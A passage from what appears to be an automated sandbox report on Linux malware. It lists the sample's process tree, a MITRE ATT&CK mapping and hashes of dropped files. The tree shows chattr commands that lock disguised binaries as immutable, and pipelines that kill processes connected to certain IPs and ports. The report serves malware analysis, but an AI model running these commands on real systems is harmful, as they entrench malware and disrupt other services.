    sh -c "ps --no-header -p 6 o pid"
    3⤵
    PID:896
  - - /bin/ps
      ps --no-header -p 6 o pid
      4⤵
      Reads CPU attributes
      PID:897
- - /bin/sh
    sh -c "ps --no-header -p 7 o pid"
    3⤵
    PID:898
  - - /bin/ps
      ps --no-header -p 7 o pid
      4⤵
      Reads CPU attributes
      PID:899
- - /bin/sh
    sh -c "ps --no-header -p 8 o pid"
    3⤵
    PID:900
  - - /bin/ps
      ps --no-header -p 8 o pid
      4⤵
      Reads CPU attributes
      PID:901
- - /bin/sh
    sh -c "ps --no-header -p 9 o pid"
    3⤵
    PID:902
  - - /bin/ps
      ps --no-header -p 9 o pid
      4⤵
      Reads runtime system information
      PID:903
- - /bin/sh
    sh -c "ps --no-header -p 10 o pid"
    3⤵
    PID:904
  - - /bin/ps
      ps --no-header -p 10 o pid
      4⤵
      Reads CPU attributes
      PID:905
- - /bin/sh
    sh -c "ps --no-header -p 11 o pid"
    3⤵
    PID:906
  - - /bin/ps
      ps --no-header -p 11 o pid
      4⤵
      Reads CPU attributes
      PID:907
- - /bin/sh
    sh -c "ps --no-header -p 12 o pid"
    3⤵
    PID:908
  - - /bin/ps
      ps --no-header -p 12 o pid
      4⤵
      PID:909
- - /bin/sh
    sh -c "ps --no-header -p 13 o pid"
    3⤵
    PID:910
  - - /bin/ps
      ps --no-header -p 13 o pid
      4⤵
      Reads CPU attributes
      PID:911
- - /bin/sh
    sh -c "ps --no-header -p 14 o pid"
    3⤵
    PID:912
  - - /bin/ps
      ps --no-header -p 14 o pid
      4⤵
      PID:913
- - /bin/sh
    sh -c "ps --no-header -p 15 o pid"
    3⤵
    PID:914
  - - /bin/ps
      ps --no-header -p 15 o pid
      4⤵
      Reads CPU attributes
      PID:915
- - /bin/sh
    sh -c "ps --no-header -p 16 o pid"
    3⤵
    PID:916
  - - /bin/ps
      ps --no-header -p 16 o pid
      4⤵
      Reads CPU attributes
      PID:917
- - /bin/sh
    sh -c "ps --no-header -p 17 o pid"
    3⤵
    PID:918
  - - /bin/ps
      ps --no-header -p 17 o pid
      4⤵
      Reads CPU attributes
      PID:919
- - /bin/sh
    sh -c "ps --no-header -p 18 o pid"
    3⤵
    PID:920
  - - /bin/ps
      ps --no-header -p 18 o pid
      4⤵
      Reads CPU attributes
      PID:921
- - /bin/sh
    sh -c "ps --no-header -p 19 o pid"
    3⤵
    PID:922
  - - /bin/ps
      ps --no-header -p 19 o pid
      4⤵
      PID:923
- - /bin/sh
    sh -c "ps --no-header -p 20 o pid"
    3⤵
    PID:924
  - - /bin/ps
      ps --no-header -p 20 o pid
      4⤵
      Reads CPU attributes
      PID:925
- - /bin/sh
    sh -c "ps --no-header -p 21 o pid"
    3⤵
    PID:926
  - - /bin/ps
      ps --no-header -p 21 o pid
      4⤵
      Reads CPU attributes
      PID:927
- - /bin/sh
    sh -c "ps --no-header -p 22 o pid"
    3⤵
    PID:928
  - - /bin/ps
      ps --no-header -p 22 o pid
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:929
- - /bin/sh
    sh -c "ps --no-header -p 23 o pid"
    3⤵
    PID:930
  - - /bin/ps
      ps --no-header -p 23 o pid
      4⤵
      PID:931
- - /bin/sh
    sh -c "ps --no-header -p 24 o pid"
    3⤵
    PID:932
  - - /bin/ps
      ps --no-header -p 24 o pid
      4⤵
      Reads CPU attributes
      PID:933
- - /bin/sh
    sh -c "ps --no-header -p 25 o pid"
    3⤵
    PID:934
  - - /bin/ps
      ps --no-header -p 25 o pid
      4⤵
      Reads CPU attributes
      PID:935
- - /bin/sh
    sh -c "ps --no-header -p 26 o pid"
    3⤵
    PID:936
  - - /bin/ps
      ps --no-header -p 26 o pid
      4⤵
      Reads CPU attributes
      PID:937
- - /bin/sh
    sh -c "ps --no-header -p 27 o pid"
    3⤵
    PID:938
  - - /bin/ps
      ps --no-header -p 27 o pid
      4⤵
      PID:939
- - /bin/sh
    sh -c "ps --no-header -p 28 o pid"
    3⤵
    PID:940
  - - /bin/ps
      ps --no-header -p 28 o pid
      4⤵
      Reads CPU attributes
      PID:941
- - /bin/sh
    sh -c "ps --no-header -p 29 o pid"
    3⤵
    PID:942
  - - /bin/ps
      ps --no-header -p 29 o pid
      4⤵
      PID:943
- - /bin/sh
    sh -c "ps --no-header -p 41 o pid"
    3⤵
    PID:944
  - - /bin/ps
      ps --no-header -p 41 o pid
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:945
- - /bin/sh
    sh -c "ps --no-header -p 42 o pid"
    3⤵
    PID:946
  - - /bin/ps
      ps --no-header -p 42 o pid
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:947
- - /bin/sh
    sh -c "ps --no-header -p 43 o pid"
    3⤵
    PID:948
  - - /bin/ps
      ps --no-header -p 43 o pid
      4⤵
      Reads CPU attributes
      PID:949
- - /bin/sh
    sh -c "ps --no-header -p 76 o pid"
    3⤵
    PID:950
  - - /bin/ps
      ps --no-header -p 76 o pid
      4⤵
      Reads CPU attributes
      PID:951
- - /bin/sh
    sh -c "ps --no-header -p 98 o pid"
    3⤵
    PID:952
  - - /bin/ps
      ps --no-header -p 98 o pid
      4⤵
      PID:953
- - /bin/sh
    sh -c "ps --no-header -p 106 o pid"
    3⤵
    PID:954
  - - /bin/ps
      ps --no-header -p 106 o pid
      4⤵
      PID:955
- - /bin/sh
    sh -c "ps --no-header -p 108 o pid"
    3⤵
    PID:956
  - - /bin/ps
      ps --no-header -p 108 o pid
      4⤵
      Reads CPU attributes
      PID:957
- - /bin/sh
    sh -c "ps --no-header -p 109 o pid"
    3⤵
    PID:958
  - - /bin/ps
      ps --no-header -p 109 o pid
      4⤵
      Reads CPU attributes
      PID:959
- - /bin/sh
    sh -c "ps --no-header -p 138 o pid"
    3⤵
    PID:960
  - - /bin/ps
      ps --no-header -p 138 o pid
      4⤵
      Reads CPU attributes
      PID:961
- - /bin/sh
    sh -c "ps --no-header -p 140 o pid"
    3⤵
    PID:962
  - - /bin/ps
      ps --no-header -p 140 o pid
      4⤵
      Reads CPU attributes
      PID:963
- - /bin/sh
    sh -c "ps --no-header -p 142 o pid"
    3⤵
    PID:964
  - - /bin/ps
      ps --no-header -p 142 o pid
      4⤵
      Reads CPU attributes
      PID:965
- - /bin/sh
    sh -c "ps --no-header -p 148 o pid"
    3⤵
    PID:966
  - - /bin/ps
      ps --no-header -p 148 o pid
      4⤵
      Reads CPU attributes
      PID:967
- - /bin/sh
    sh -c "ps --no-header -p 168 o pid"
    3⤵
    PID:968
  - - /bin/ps
      ps --no-header -p 168 o pid
      4⤵
      Reads CPU attributes
      PID:969
- - /bin/sh
    sh -c "ps --no-header -p 208 o pid"
    3⤵
    PID:970
  - - /bin/ps
      ps --no-header -p 208 o pid
      4⤵
      Reads CPU attributes
      PID:971
- - /bin/sh
    sh -c "ps --no-header -p 217 o pid"
    3⤵
    PID:972
  - - /bin/ps
      ps --no-header -p 217 o pid
      4⤵
      Reads CPU attributes
      PID:973
- - /bin/sh
    sh -c "ps --no-header -eL o lwp"
    3⤵
    PID:974
  - - /bin/ps
      ps --no-header -eL o lwp
      4⤵
      Reads CPU attributes
      PID:975
- - /bin/sh
    sh -c "ps --no-header -p 271 o pid"
    3⤵
    PID:977
  - - /bin/ps
      ps --no-header -p 271 o pid
      4⤵
      Reads CPU attributes
      PID:978
- - /bin/sh
    sh -c "ps --no-header -p 272 o pid"
    3⤵
    PID:979
  - - /bin/ps
      ps --no-header -p 272 o pid
      4⤵
      PID:981
- - /bin/sh
    sh -c "ps --no-header -p 283 o pid"
    3⤵
    PID:982
  - - /bin/ps
      ps --no-header -p 283 o pid
      4⤵
      Reads CPU attributes
      PID:983
- - /bin/sh
    sh -c "ps --no-header -p 284 o pid"
    3⤵
    PID:984
  - - /bin/ps
      ps --no-header -p 284 o pid
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:985
- - /bin/sh
    sh -c "ps --no-header -p 285 o pid"
    3⤵
    PID:986
  - - /bin/ps
      ps --no-header -p 285 o pid
      4⤵
      Reads CPU attributes
      PID:987
- - /bin/sh
    sh -c "ps --no-header -p 290 o pid"
    3⤵
    PID:988
  - - /bin/ps
      ps --no-header -p 290 o pid
      4⤵
      PID:989
- - /bin/sh
    sh -c "ps --no-header -eL o lwp"
    3⤵
    PID:990
  - - /bin/ps
      ps --no-header -eL o lwp
      4⤵
      Reads runtime system information
      PID:991
- - /bin/sh
    sh -c "ps --no-header -p 291 o pid"
    3⤵
    PID:992
  - - /bin/ps
      ps --no-header -p 291 o pid
      4⤵
      PID:993
- - /bin/sh
    sh -c "ps --no-header -eL o lwp"
    3⤵
    PID:994
  - - /bin/ps
      ps --no-header -eL o lwp
      4⤵
      Reads runtime system information
      PID:995
- - /bin/sh
    sh -c "ps --no-header -p 293 o pid"
    3⤵
    PID:996
  - - /bin/ps
      ps --no-header -p 293 o pid
      4⤵
      Reads CPU attributes
      PID:997
- - /bin/sh
    sh -c "ps --no-header -eL o lwp"
    3⤵
    PID:998
  - - /bin/ps
      ps --no-header -eL o lwp
      4⤵
      Reads CPU attributes
      PID:999
- - /bin/sh
    sh -c "ps --no-header -p 301 o pid"
    3⤵
    PID:1000
  - - /bin/ps
      ps --no-header -p 301 o pid
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1001
- - /bin/sh
    sh -c "ps --no-header -p 302 o pid"
    3⤵
    PID:1002
  - - /bin/ps
      ps --no-header -p 302 o pid
      4⤵
      Reads CPU attributes
      PID:1003
- - /bin/sh
    sh -c "ps --no-header -p 312 o pid"
    3⤵
    PID:1004
  - - /bin/ps
      ps --no-header -p 312 o pid
      4⤵
      PID:1005
- - /bin/sh
    sh -c "ps --no-header -p 351 o pid"
    3⤵
    PID:1006
  - - /bin/ps
      ps --no-header -p 351 o pid
      4⤵
      Reads CPU attributes
      PID:1007
- - /bin/sh
    sh -c "ps --no-header -p 588 o pid"
    3⤵
    PID:1008
  - - /bin/ps
      ps --no-header -p 588 o pid
      4⤵
      Reads CPU attributes
      PID:1009
- - /bin/sh
    sh -c "ps --no-header -p 603 o pid"
    3⤵
    PID:1010
  - - /bin/ps
      ps --no-header -p 603 o pid
      4⤵
      Reads CPU attributes
      PID:1011
- - /bin/sh
    sh -c "ps --no-header -p 606 o pid"
    3⤵
    PID:1012
  - - /bin/ps
      ps --no-header -p 606 o pid
      4⤵
      PID:1013
- - /bin/sh
    sh -c "ps --no-header -p 608 o pid"
    3⤵
    PID:1014
  - - /bin/ps
      ps --no-header -p 608 o pid
      4⤵
      Reads CPU attributes
      PID:1015
- - /bin/sh
    sh -c "ps --no-header -p 609 o pid"
    3⤵
    PID:1016
  - - /bin/ps
      ps --no-header -p 609 o pid
      4⤵
      Reads CPU attributes
      PID:1017
- - /bin/sh
    sh -c "ps --no-header -p 646 o pid"
    3⤵
    PID:1018
  - - /bin/ps
      ps --no-header -p 646 o pid
      4⤵
      Reads CPU attributes
      PID:1019
- - /bin/sh
    sh -c "ps --no-header -p 649 o pid"
    3⤵
    PID:1020
  - - /bin/ps
      ps --no-header -p 649 o pid
      4⤵
      Reads CPU attributes
      PID:1021
- - /bin/sh
    sh -c "ps --no-header -p 652 o pid"
    3⤵
    PID:1022
  - - /bin/ps
      ps --no-header -p 652 o pid
      4⤵
      PID:1023
- - /bin/sh
    sh -c "ps --no-header -p 653 o pid"
    3⤵
    PID:1024
  - - /bin/ps
      ps --no-header -p 653 o pid
      4⤵
      Reads CPU attributes
      PID:1025
- - /bin/sh
    sh -c "ps --no-header -p 654 o pid"
    3⤵
    PID:1026
  - - /bin/ps
      ps --no-header -p 654 o pid
      4⤵
      PID:1027
- - /bin/sh
    sh -c "ps --no-header -p 661 o pid"
    3⤵
    PID:1028
  - - /bin/ps
      ps --no-header -p 661 o pid
      4⤵
      Reads CPU attributes
      PID:1029
- - /bin/sh
    sh -c "ps --no-header -p 662 o pid"
    3⤵
    PID:1030
  - - /bin/ps
      ps --no-header -p 662 o pid
      4⤵
      Reads CPU attributes
      PID:1031
- - /bin/sh
    sh -c "ps --no-header -eL o lwp"
    3⤵
    PID:1032
  - - /bin/ps
      ps --no-header -eL o lwp
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1033
- - /bin/sh
    sh -c "ps --no-header -p 663 o pid"
    3⤵
    PID:1034
  - - /bin/ps
      ps --no-header -p 663 o pid
      4⤵
      Reads CPU attributes
      PID:1035
- - /bin/sh
    sh -c "ps --no-header -eL o lwp"
    3⤵
    PID:1036
  - - /bin/ps
      ps --no-header -eL o lwp
      4⤵
      Reads CPU attributes
      PID:1037
- - /bin/sh
    sh -c "ps --no-header -p 883 o pid"
    3⤵
    PID:1038
  - - /bin/ps
      ps --no-header -p 883 o pid
      4⤵
      Reads CPU attributes
      PID:1039
- - /bin/sh
    sh -c "ps --no-header -p 884 o pid"
    3⤵
    PID:1040
  - - /bin/ps
      ps --no-header -p 884 o pid
      4⤵
      PID:1041
- - /bin/sh
    sh -c "ps --no-header -p 885 o pid"
    3⤵
    PID:1042
  - - /bin/ps
      ps --no-header -p 885 o pid
      4⤵
      Reads CPU attributes
      PID:1043
- - /bin/sh
    sh -c "ps --no-header -p 980 o pid"
    3⤵
    PID:1044
  - - /bin/ps
      ps --no-header -p 980 o pid
      4⤵
      Reads CPU attributes
      PID:1045
- /bin/sleep
  sleep 1
  2⤵
  PID:1049
- /usr/bin/chattr
  chattr -i /usr/bin/ip6network
  2⤵
  - Attempts to change immutable files
  PID:1052
- /usr/bin/chattr
  chattr -i /usr/bin/kswaped
  2⤵
  - Attempts to change immutable files
  PID:1053
- /usr/bin/chattr
  chattr -i /usr/bin/irqbalanced
  2⤵
  - Attempts to change immutable files
  PID:1054
- /usr/bin/chattr
  chattr -i /usr/bin/rctlcli
  2⤵
  - Attempts to change immutable files
  PID:1055
- /usr/bin/chattr
  chattr -i /usr/bin/systemd-network
  2⤵
  - Attempts to change immutable files
  PID:1056
- /usr/bin/chattr
  chattr -i /usr/bin/pamdicks
  2⤵
  - Attempts to change immutable files
  PID:1057
- /usr/bin/chattr
  chattr +i /usr/bin/ip6network
  2⤵
  - Attempts to change immutable files
  PID:1058
- /usr/bin/chattr
  chattr +i /usr/bin/kswaped
  2⤵
  - Attempts to change immutable files
  PID:1059
- /usr/bin/chattr
  chattr +i /usr/bin/irqbalanced
  2⤵
  - Attempts to change immutable files
  PID:1060
- /usr/bin/chattr
  chattr +i /usr/bin/rctlcli
  2⤵
  - Attempts to change immutable files
  PID:1061
- /usr/bin/chattr
  chattr +i /usr/bin/systemd-network
  2⤵
  - Attempts to change immutable files
  PID:1062
- /usr/bin/chattr
  chattr +i /usr/bin/pamdicks
  2⤵
  - Attempts to change immutable files
  PID:1063
- /bin/sleep
  sleep 1
  2⤵
  PID:1064
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1069
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:1068
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1070
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1071
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1076
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1075
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1074
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:1073
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1082
- /bin/grep
  grep -v -
  2⤵
  PID:1081
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1080
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1079
- /bin/grep
  grep :443
  2⤵
  PID:1078
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1086
- /bin/grep
  grep -v -
  2⤵
  PID:1087
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1088
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1085
- /bin/grep
  grep :23
  2⤵
  PID:1084
- /bin/grep
  grep -v -
  2⤵
  PID:1093
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1094
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1092
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1091
- /bin/grep
  grep :443
  2⤵
  PID:1090
- /bin/grep
  grep -v -
  2⤵
  PID:1099
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1100
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1098
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1097
- /bin/grep
  grep :143
  2⤵
  PID:1096
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1106
- /bin/grep
  grep -v -
  2⤵
  PID:1105
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1104
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1103
- /bin/grep
  grep :2222
  2⤵
  PID:1102
- /bin/grep
  grep -v -
  2⤵
  PID:1111
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1110
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1112
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1109
- /bin/grep
  grep :3333
  2⤵
  PID:1108
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1118
- /bin/grep
  grep -v -
  2⤵
  PID:1117
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1116
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1115
- /bin/grep
  grep :3389
  2⤵
  PID:1114
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1124
- /bin/grep
  grep -v -
  2⤵
  PID:1123
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1122
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1121
- /bin/grep
  grep :5555
  2⤵
  PID:1120
- /bin/grep
  grep -v -
  2⤵
  PID:1129
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1130
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1128
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1127
- /bin/grep
  grep :6666
  2⤵
  PID:1126
- /bin/grep
  grep -v -
  2⤵
  PID:1135
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1136
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1134
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1133
- /bin/grep
  grep :6665
  2⤵
  PID:1132

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:723

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Enumerates kernel/hardware configuration
PID:722

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:763

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
PID:762

/usr/local/sbin/apt-extracttemplates
apt-extracttemplates /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb
1⤵
PID:856

/usr/local/bin/apt-extracttemplates
apt-extracttemplates /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb
1⤵
PID:856

/usr/sbin/apt-extracttemplates
apt-extracttemplates /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb
1⤵
PID:856

/usr/bin/apt-extracttemplates
apt-extracttemplates /var/cache/apt/archives/unhide_20130526-1+deb9u1_armhf.deb
1⤵
- Writes file to tmp directory
PID:856
- /usr/bin/dpkg
  /usr/bin/dpkg --print-foreign-architectures
  2⤵
  PID:858
- /usr/bin/dpkg
  /usr/bin/dpkg --print-foreign-architectures
  2⤵
  PID:859
- /usr/bin/dpkg
  /usr/bin/dpkg --print-foreign-architectures
  2⤵
  PID:860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Hijack Execution Flow

T1574

Privilege Escalation

Hijack Execution Flow

T1574

Defense Evasion

Hijack Execution Flow

T1574

Indicator Removal

T1070

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/.zshs

Filesize
2B

MD5
b026324c6904b2a9cb4b88d6d61c81d1

SHA1
e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e

SHA256
4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865

SHA512
3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

Download Submit
/usr/bin/irqbalanced

Filesize
2B

MD5
6d7fce9fee471194aa8b5b6e47267f03

SHA1
a3db5c13ff90a36963278c6a39e4ee3c22e2a436

SHA256
1121cfccd5913f0a63fec40a6ffd44ea64f9dc135c66634ba001d10bcf4302a2

SHA512
2b59d179d9815994f687383a886ea34109889756efca5ab27318cc67ce2a21261d12fa6fee6b8c716f72214ead55ee0d789d6c35cff977d40ef5728ba9188a80

Download Submit
/usr/bin/kswaped

Filesize
2B

MD5
26ab0db90d72e28ad0ba1e22ee510510

SHA1
7448d8798a4380162d4b56f9b452e2f6f9e24e7a

SHA256
53c234e5e8472b6ac51c1ae1cab3fe06fad053beb8ebfd8977b010655bfdd3c3

SHA512
63e22ec2fbeebabf005e58fbfb0eee607c4aa417045a68a0cc63767b048e3559268d35e72f367d3b2dbd5dbddf12fc4397762ba149260b3795a0391713bddcd7

Download Submit
/usr/bin/pamdicks

Filesize
2B

MD5
9ae0ea9e3c9c6e1b9b6252c8395efdc1

SHA1
ccf271b7830882da1791852baeca1737fcbe4b90

SHA256
06e9d52c1720fca412803e3b07c4b228ff113e303f4c7ab94665319d832bbfb7

SHA512
f3d08a4bfef201adbe711e8805f96ff13909719107dcac81f4fc9185040d59d8d573344a0707e697f8b4f0212e0d79f3bdd6b86688dd8c54019b9d93c937f3ca

Download Submit
/usr/bin/rctlcli

Filesize
2B

MD5
48a24b70a0b376535542b996af517398

SHA1
9c6b057a2b9d96a4067a749ee3b3b0158d390cf1

SHA256
7de1555df0c2700329e815b93b32c571c3ea54dc967b89e81ab73b9972b72d1d

SHA512
db545c410fd0c8ede533d5b0666cd2798ba380bd25b655619cd5fd3a33a255569b3ccc319bfdef3322d8392d894d15c2e6aa2d53346e6ac54eaf5d627bfe6a9a

Download Submit
/usr/bin/systemd-network

Filesize
2B

MD5
1dcca23355272056f04fe8bf20edfce0

SHA1
5d9474c0309b7ca09a182d888f73b37a8fe1362c

SHA256
f0b5c2c2211c8d67ed15e75e656c7862d086e9245420892a7de62cd9ec582a06

SHA512
29b3573989378848e91465abb8bb12aaad1c40f01ddba6ce5dce4de88d61d49621cd4272bc6f889cd469e9490040b412eb0a237cf2cd49c637da1d5de5903f3d

Download Submit
/var/cache/apt/archives/partial/unhide_20130526-1+deb9u1_armhf.deb

Filesize
50KB

MD5
e66f2498c1701e9b63de88340e870903

SHA1
00ce63108f378e2e50b0d98b04a31b6abd7c2c8f

SHA256
c41eae3423d2b1a0205f793cdf26e8c1054b36131c23271be2bc89bc11b45153

SHA512
e035f62f637025bd34778d794a71541fddb6f462179d77c4ca57efef0ca0b7eed6dd8e0f1a84804ba21b617e7453ffeb6c33ee0c6170864e6fee45ccaf1fdd72

Download Submit
/var/lib/dpkg/status-new

Filesize
405KB

MD5
cd1f9639e30558c34d691bce1742146a

SHA1
e4867ab869837f6fa24b2f4503519dd93b641f70

SHA256
b5151406bdec68e09d49f442095bcf5dfd4727df281d7b176b040277b04608fa

SHA512
06760fd2cf3575fd30bda2fcb57c51a3d47af2c2c9c563ef7e1779b30805f2dcc3e2fdb7a58ac2b24b75693efea7d9f798d6d01f0596992c95622f2b7e5a0a4c

Download Submit
/var/lib/dpkg/status-new

Filesize
405KB

MD5
0188a85c35fd599b05d89c44cececefa

SHA1
54e78e6872fbf83628ec36a7f8b22cda87eea221

SHA256
111fb682f53cccc97d157343c4d16e9c8667ed5601a7cd2747932591f47b1bc3

SHA512
78aa4b4647fae0050e4caf09270e325eb4ff9e487483d97b0ec9eae23a8eb5ee886b1f5088626b7ce5ab77b3eda50ef91855efbb9fadf8c95e883b6df29de6ca

Download Submit
/var/lib/dpkg/tmp.ci/control

Filesize
1KB

MD5
833652085c859a51249abf5829e1c6d0

SHA1
8c98db0b35c4b05b557efad5b9be94af5f4b5b99

SHA256
848f1250962547a916b4a83f199f649e97fd22ac61560fba7709cc97bd1651fa

SHA512
2edacf594dc4f3fb5d0fe04ff79854755fd63705bdd492c61edefb183a1fb6db0f358d186ffd26793e7d95dd1c239db47525a89b2f24356bb7286e5b3d804b31

Download Submit
/var/lib/dpkg/tmp.ci/md5sums

Filesize
1KB

MD5
244ac8c14171e2981ab0bc39a93abd60

SHA1
067f655a1b0b7482c65b534cfd0299c2d180ba2f

SHA256
7b3eb5efdcb3e362f94183f55c350bbb3d8b0f4143b7342d5dc7b7adb641fe60

SHA512
9ddf6f85d92a4c9de104fb0de5f4e3a2811bc200f7ecb5c85bc55cbaa78141b7ac64c1d80ccf5c9bd37b84010ef91b34300d5edb823cb19019f07cbd3a0388fd

Download Submit
/var/lib/dpkg/tmp.ci/postinst

Filesize
353B

MD5
b887769054bb764b1e582038b7042935

SHA1
751b3bada45413feaaa476ac3c3a874ef9254bc9

SHA256
7fc5dccd4942439866b95718e5f7854db8126631227c5cdfe0def4318964f058

SHA512
48cd7e9cb82984a62381c0628a10b4523dafbb21a463e15966f42e2681fd00d6419a611ed2d1bb0e96d9b46b9ea58e0dcd1be4b4cdca9ebf6e3299cee062a270

Download Submit
/var/lib/dpkg/tmp.ci/triggers

Filesize
26B

MD5
36fffcea595f30e92075ccee07fc80e3

SHA1
83d55f634b187f828b1d40103ba92b64fd45f289

SHA256
685fd14e8cff253e5cba3614ed046ebd69eb44cf4b95e304a5cf746e3f206bc6

SHA512
0017504e1e4c8b3159e7ff9128c4c604bf928ecbfe9b8e1beac1c892948092c8eaf9f85d71e6169edcfc17cae295fe60ecf12f7653157ef3d61dc83016ef4656

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
df9dccc3b7f16d2c1575c38ddd2ce647

SHA1
a88c70858c9a619641bb4b5626bd51b8d74ef3fe

SHA256
078cc50bbf7230274da49c9d5e5c3586f3c55749abaf598a229daefe2c95fd34

SHA512
ca7b54b962d563855cfd3e57955886b5f66df196d5b32f5dd1036ccf6d06b71b5a8fc5acf0965ebab7c1b584596646c762cfda74bdf648e8f36024c179493ead

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
49b3c2d840ffd360e6070f135d058903

SHA1
8dafb616b837e4fc9b7553a67ac9e6b4eeb422ca

SHA256
94c7a05b09006b922e0c03f40a2800d10f096586952984a8af73011df7105c05

SHA512
fdeb142eae70eb18069bbaa37af3fcac3e85f1d7a401128897a0c01500b45f817dfb5e0b7e43f3e843121cae5a383d05a81467d8f9162aa577bf202166f75c36

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
edae9b7299f2afc09258160786a4dada

SHA1
dd7aa0c8aa29e937efd88b9eb39811e1460b62b9

SHA256
cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569

SHA512
0e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
2584d6009b2cbbc3450402a4f04acc1a

SHA1
eeef78e0aa600c021fbde9a5f43a2ae732657ea6

SHA256
ead5b83ed8a271377d7a6c3efff29e0464a994b9e2b6f7d38868246239e7fa12

SHA512
a7499cc4c1776073432c2ded2c638df9acf37ae3d47198e5434ba7f6fd50517f266dc03283b0c8dbe2d481f18e9b5af01670d45e23dc1d388b2e697e85d43889

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
733b8f2c497848b75b59e7b56398b169

SHA1
8673a898086e4d073838fe18383dc2a792f4fc9a

SHA256
684c091d7afbcb3e1e3052eec030f80959f87a08e22eec094ce48954d64276f5

SHA512
8475d757e8db81dbcbe8ce993a9cfe5bdf2363b2162ed95bf8ea61ad76ded6c51d93b18221b280d55fe20aa47c097f77a15230a014688ab2d2acd3d84db5b836

Download Submit
/var/lib/dpkg/updates/tmp.i

Filesize
4KB

MD5
7e583721a5bcdc5e70b6557cfe74cdd0

SHA1
aef80b94392d5a5332d1870d6744899790641cd4

SHA256
35c69bd8f9cddb81d592c1559b79ae2c46708eba228d9b90d869ccee0ecf9c6c

SHA512
e2c1580b01f350bc48665ecbb10bf7daa4ee47bb1200bf25e4ca26027c9dede60c1e7200a1781b4a583cb72567d300cb37bf849d42fefbcb4d2b35a07bb696f6

Download Submit
/var/log/apt/eipp.log.xz

Filesize
18KB

MD5
